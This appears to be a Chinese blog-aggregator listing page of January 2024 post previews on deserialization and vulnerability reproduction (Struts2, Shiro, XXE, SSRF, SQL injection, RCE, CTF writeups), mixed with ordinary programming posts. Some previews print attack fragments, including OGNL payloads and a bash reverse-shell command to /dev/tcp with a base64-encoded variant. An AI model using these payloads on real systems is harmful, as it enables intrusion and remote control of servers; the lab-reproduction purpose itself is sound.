反序列化漏洞复现

蓝凌OA sysUiExtend.do 任意文件上传漏洞复现

0x01产品简介蓝凌核心产品EKP平台定位为新一代数字化生态OA平台,数字化向纵深发展,正加速构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化,赋能大中型组织更高效的内外协作与管理,支撑商业模式创新与转型发展。0x02漏洞概述蓝凌OAsysUiExtend.do接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩
OidBoy_G·2024-01-25 06:28

[漏洞复现]Apache Struts2/S2-015 (CVE-2013-2134)

二、漏洞复现春秋云境.com进入靶场开始复现构造payload/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_
free key·2024-01-25 06:41

[漏洞复现]Apache POI < 3.10.1 XXE(CVE-2014-3529)

二、漏洞复现春秋云境.com进入靶场准备文件和环境创建一个[Content_Types].xml文件和xxe.dtd文件注意名字不可修改###xxe.dtd###">%all;###[Content_Typ
free key·2024-01-25 06:10

[漏洞复现]Apache Struts2/S2-013 (CVE-2013-1966)

二、漏洞复现春秋云境.com进入靶场开始复现bash-i>&/dev/tcp/127.0.0.1/99990>&1base加密bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOT
free key·2024-01-25 06:10

[漏洞复现] Craft (CVE-2023-41892)

前言本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!一、漏洞情况分析CraftCMS是美国Pixel&tonic公司的一套内容管理系统(CMS)。一个开源的内容管理系统,它专注于用户友好的内容创建过程,逻辑清晰明了,是一个高度自由,高度自定义设计的平台吗,可以用来创建个人或企业网站也可以搭建企业级电子商务系统。Pixel&tonicCraftCMS4.4.15之前版本存在代码
free key·2024-01-25 06:10

[漏洞复现]Apache Shiro < 1.6.0 验证绕过漏洞(CVE-2020-13933)

二、漏洞复现春秋云境.com进入靶场开始复现/admin/%3b三、漏洞处置建议把靶场关了,跟漏洞说“白白吧”
free key·2024-01-25 06:10

[漏洞复现]Apache Struts2/S2-015 (CVE-2013-2135)

二、漏洞复现春秋云境.com进入靶场开始复现构造好payload,弹nc${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#
free key·2024-01-25 06:04

一文从0到1手把手教学UI自动化测试之数据驱动!

一、JSON文件JSON库主要应用于序列化以及反序列化中,特别是在API的自动化测试中,序列化以及反序列化是知
程序员念姐·2024-01-25 02:27

二叉树的序列化和反序列化

设计一个算法,并编写代码来序列化和反序列化二叉树。将树写入一个文件被称为“序列化”,读取文件后重建同样的二叉树被称为“反序列化”。
涂印·2024-01-25 00:22

D-Tale SSRF漏洞复现(CVE-2024-21642)

0x01产品简介D-tale是一个在2020年2月推出的库,是Pandas数据结构的可视化工具。它具有许多功能,对于探索性数据分析非常方便、支持交互式绘图、3d绘图、热图、特征之间的相关性、构建自定义列等等。0x02漏洞概述D-Tale是Pandas数据结构的可视化工具。3.9.0之前的D-Tale版本的用户可能容易受到服务器端请求伪造(SSRF)的攻击,从而使攻击者能够访问服务器上的文件。0x0
OidBoy_G·2024-01-24 22:45

【复现】Hytec Inter HWL 2511 SS路由器RCE漏洞_25

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述HytecInterHWL2511SS是日本HytecInter公司的一款工业级LTE路由器,可用于远程数据传输
穿着白衣·2024-01-24 22:44

【复现】万户ezoffice协同管理平台 SQL注入漏洞_26

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述万户ezOFFICE协同管理平台分为企业版和政务版。
穿着白衣·2024-01-24 22:44

【复现】奥威亚视屏云平台文件读取漏洞_27

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述奥威亚视屏云平台拥有丰富的应用模块,包括结对帮扶、网络教研、教研共同体、优课汇聚、教学资源、在线巡课、AI
穿着白衣·2024-01-24 22:44

【复现】D-Tale SSRF漏洞(CVE-2024-21642)_26

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述D-Tale数据可视化插件是后端框架Flask与前端框架React组合产生的一款开源的数据可视化分析插件。
穿着白衣·2024-01-24 22:13

小迪安全学习笔记--第37天:web漏洞--反序列化之PHP和java全解(上)

PHP反序列化原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。
铁锤2号·2024-01-24 16:52

小迪安全学习笔记--第38天:web漏洞-反序列化之PHP和JAVA全解(下)

有个工具,ysoserial:https://github.com/frohoff/ysoserial概念序列化和反序列化序列化(serialization):将对象的状态信息转换为可以存储或传输的形式的过程
铁锤2号·2024-01-24 16:52

WEB漏洞-反序列化之PHP&JAVA全解(上)

PHP反序列化原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。
深白色耳机·2024-01-24 16:21

WEB漏洞-反序列化之PHP&JAVA全解(下)

序列化和反序列化序列化(Serialization):将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。
深白色耳机·2024-01-24 16:21

V2022全栈培训笔记(WEB攻防46-WEB攻防-通用漏洞&PHP反序列化&原生类&漏洞绕过&公私有属性)

第46天WEB攻防-通用漏洞&PHP反序列化&原生类&漏洞绕过&公私有属性知识点:1、反序列化魔术方法全解2、反序列化变量属性全解3、反序列化魔术方法原生类4、反序列化语言特性漏洞绕过~其他魔术方法共有
清歌secure·2024-01-24 16:20

web漏洞-反序列化之JAVA全解(38)

#概念:我们有时候需要保存某一个对象的信息,会进行一些操作,类似于反序列化,序列化的过程中的对象,就是我们所说的class的状态以二进制储存到文件的系统中,然后另外一个系统对这个二进制进行读取,再来还原
上线之叁·2024-01-24 16:20

CTF之think_java反序列化完整案例

2020-网鼎杯-朱雀组-Web-think_java详解环境复现CTFHub附件代码审计通过打开附件文件中test类文件发现//发现文件路劲@RequestMapping({"/common/test"})publicclassTest{publicTest(){}@PostMapping({"/sqlDict"})//通过文件命名可以发现是关于sql的文件@Access@ApiOperatio
出顾茅庐·2024-01-24 16:49

第38天-WEB 漏洞-反序列化之 PHP&JAVA 全解(下)

反序列化反序列化:从存储区中读取该数据,并将其还原为对象的过程,称为反序列化
IsecNoob·2024-01-24 16:18

38-WEB漏洞-反序列化之PHP&JAVA全解(下)

WEB漏洞-反序列化之PHP&JAVA全解(下)一、Java中API实现二、序列化理解三、案例演示3.1、本地3.2、Java反序列化及命令执行代码测试3.3、WebGoat_Javaweb靶场反序列化测试
月亮今天也很亮·2024-01-24 16:17

使用WAF防御网络上的隐蔽威胁之代码执行攻击

与命令注入的区别代码执行攻击的例子包括:通过不安全的数据反序列化执行恶意代码。利用脚本
小名空鵼·2024-01-24 11:15

JSON 数据格式处理之alibaba.fastjson

目录前言一、创建JSONObject对象二、JSON格式的字符串与JSONObject对象相互转换三、获取key的值四、反序列化:将可供传输的数据格式转化为对象。
百炼成神 LV@菜哥·2024-01-24 10:51

解决:Jackson反序列化Java内部类失败(序列化后的识别码为LinkedHashMap,而非内部类本身)

问题描述先看实体类:importcom.fasterxml.jackson.annotation.*;importlombok.Data;importorg.jeecg.common.system.base.entity.JeecgEntity;importorg.jeecg.modules.iot.entity.jackson.WorkerConverter;importorg.jeecg.mo
SerikaOnoe·2024-01-24 09:35

漏洞复现】用友NC Cloud portal/file接口任意文件读取漏洞

文章目录前言声明一、用友NCCloudportal/file接口简介二、漏洞描述三、影响版本四、漏洞复现五、修复建议前言用友网络是全球领先的企业与公共组织软件、云服务、金融服务提供商。
李火火安全阁·2024-01-24 00:32

用友 GRP U8 UploadFile 命令执行漏洞

文章目录前言声明一、漏洞描述二、影响版本三、漏洞复现前言用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。
李火火安全阁·2024-01-24 00:57

基于PHP反序列化练习

>;序列化后数据:手动修改序列化后的数据实现age年龄+100,输出反序列化后的内容:name=
爱吃银鱼焖蛋·2024-01-23 18:29

【精选】PHP&java 序列化和反序列化漏洞

博主介绍‍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录首先其次技巧和方法
hacker-routing·2024-01-23 17:47

Java反序列化

JAVA反序列化运行文件流程:Java是一个跨平台语言:真正的Java语言的后缀就是.Java,其他的后缀也属于Java文件例如:xxx.jar的属于一个压缩包如果使用解压缩解压就会发现里面超多的xxxx.class
爱吃银鱼焖蛋·2024-01-23 17:39

对网站进行打点(不要有主动扫描行为)

目的:1.上传一个一句话木马2.挖到命令执行3.挖到反序列化漏洞4.钓鱼假设对“千峰”网站进行打点:1.利用平台1.利用各类平台:天眼查-商业查询平台_企业信息查询_公司查询_工商查询_企业信用信息系统使用平台查找根据分公司等
爱吃银鱼焖蛋·2024-01-23 17:38

保护隐私数据:使用Java `transient`关键字

欢迎来到我的博客,代码的世界里,每一行都是一个故事保护隐私数据:使用Java`transient`关键字前言什么是java对象序列化transient关键字的基础知识序列化与反序列化过程避免transient
一只牛博·2024-01-23 15:53

fastjson-BCEL不出网打法原理分析

FastJson反序列化漏洞与原生的Java反序列化的区别在于,FastJson反序列化并未使用readObject方法,而是由FastJson自定一套反序列化的过程。
网安Dokii·2024-01-23 14:09

【Java IO分类】从传输方式和数据操作上理解 Java IO分类

从传输方式上字节流字符流字节流和字符流的区别字节转字符Input/OutputStreamReader/WriterIO理解分类-从数据操作上文件(file)数组([])管道操作基本数据类型缓冲操作打印对象序列化反序列化转换
沁禹·2024-01-23 13:34

Atlassian Confluence RCE漏洞复现(CVE-2023-22527)

0x01产品简介AtlassianConfluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。是面向大型企业和组织的高可用性、可扩展性和高性能版本。0x02漏洞概述AtlassianConfluence/template/aui/text-inline.vm接口处存在velocity模板注入,未
OidBoy_G·2024-01-23 10:24

Aria2 WebUI控制台 任意文件读取漏洞复现(CVE-2023-39141)

0x01产品简介Aria2WebUI控制台是用于下载文件的实用程序。它支持HTTP(S)/FTP/SFTP/BitTorrent和Metalink协议。aria2可以从多个来源/协议下载文件,并尝试利用您的最大下载带宽。它支持同时从HTTP(S)/FTP/SFTP和BitTorrent下载文件,而从HTTP(S)/FTP/SFTP下载的数据上传到BitTorrent群。使用Metalink块校验和
OidBoy_G·2024-01-23 10:24

Viessmann Vitogate RCE漏洞复现(CVE-2023-45852)

0x01产品简介ViessmannVitogate300是用于将ViessmannLON连接到BACnet或Modbus的网关。0x02漏洞概述Vitogate300组件/cgi-bin/vitogate.cgi中的一个问题允许未经身份验证的攻击者绕过身份验证,通过特制的请求执行任意命令,可导致服务器失陷。0x03影响范围version<=2.1.3.00x04复现环境FOFA:app="Vito
OidBoy_G·2024-01-23 10:54

PrestaShop购物系统 SQL注入漏洞复现(CVE-2023-30150)

0x01产品简介PrestaShop是一个功能丰富,基于PHP5开发的Web2.0网上购物系统。PrestaShop具有可定制,稳定等特点。整个系统只有5.8MB,易于快速安装。0x02漏洞概述PrestaShop的部分主题中使用LeoCustomAjax模块拓展,LeoCustomAjax模块中可以在/modules/leocustomajax/leoajax.php中使用多个GET参数(cat
OidBoy_G·2024-01-23 10:20

浅谈Java序列化

稍后,这些字节流可以被反序列化以重建原来的对象。这个机制在远程方法调用(RMI)、JavaBeans,以及持久化等多种情景中非常有用。
青衫客36·2024-01-23 10:38

Springboot 项目中 Redis 反序列化异常

在进行项目的完善和修改过程中,难免出一些烂记性导致的bug。25/10错误日志ERRORo.a.c.c.C.[.[localhost].[/].[dispatcherServlet]:181-Servlet.service()forservlet[dispatcherServlet]incontextwithpath[]threwexception[Requestprocessingfailed;
FantJ·2024-01-23 08:41

2023年春秋杯网络安全联赛冬季赛 Writeup

Webezezez_phppicupMisc谁偷吃了外卖modules明文混淆PwnnmanagerbookReupx2023CryptoCFisCryptoFaker挑战题勒索流量Ezdede可信计算Webezezez_php反序列化
末 初·2024-01-23 07:21

redis未授权访问全漏洞复现

redis未授权访问全漏洞复现Redis有关的漏洞具有明显的时间分段性,在15年11月之前,主要是未授权导致的数据泄露,获得一些账号密码。
清歌secure·2024-01-23 07:03

漏洞复现】SpringBlade export-user接口SQL注入漏洞

文章目录前言声明一、SpringBlade系统简介二、漏洞描述三、影响版本四、漏洞复现五、修复建议前言SpringBlade是一个由商业级项目升级优化而来的微服务架构采用SpringBoot2.7、SpringCloud2021
李火火安全阁·2024-01-23 02:24

【权限提升】Linux Kernel ebpf 提权漏洞(CVE-2022-23222)

文章目录前言一、漏洞描述二、漏洞影响版本三、漏洞复现四、漏洞修复前言CVE-2022-23222LinuxKernelebpf权限提升漏洞一、漏洞描述eBPF(extendedBerkeleyPacketFilter
李火火安全阁·2024-01-23 02:54

CVE-2020-1938漏洞复现(文末附EXP代码)

CVE-2020-1938ApacheTomcat文件包含漏洞复现1环境搭建1.1Vulhub靶机搭建1.1.1环境安装(1)安装docker$curl-fsSLhttps://get.docker.com
Vitaminapple·2024-01-23 02:53

CVE-2013-2028 经典栈溢出漏洞复现资料整理

一个经典的由整数溢出导致栈溢出的漏洞。下面感觉写的有点乱。复现漏洞CVE-2013-2028:nginx栈溢出漏洞相关基础知识栈的基础知识:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/stack-intro-zh/栈溢出原理:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sta
破落之实·2024-01-23 02:53

CloudPanel file-manager/backend/makefile接口存在远程命令执行漏洞CVE-2023-35885

1.CloudPanel简介微信公众号搜索:南风漏洞复现文库该文章南风漏洞复现文库公众号首发CloudPanel是一个基于Web的控制面板或管理界面,旨在简化云托管环境的管理。它提供了
sublime88·2024-01-23 02:51

漏洞复现】CloudPanel makefile接口远程命令执行漏洞(CVE-2023-35885)

文章目录前言声明一、CloudPanel简介二、漏洞描述三、影响版本四、漏洞复现五、修复建议前言CloudPanel是一个基于Web的控制面板或管理界面,旨在简化云托管环境的管理。
李火火安全阁·2024-01-23 02:20

单例模式安全问题--序列化破坏单例模式

通过序列化和反序列化拿到了不同的对象。
wbpailxt·2024-01-23 01:20
上一页 9 10 11 12 13 14 15 16 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他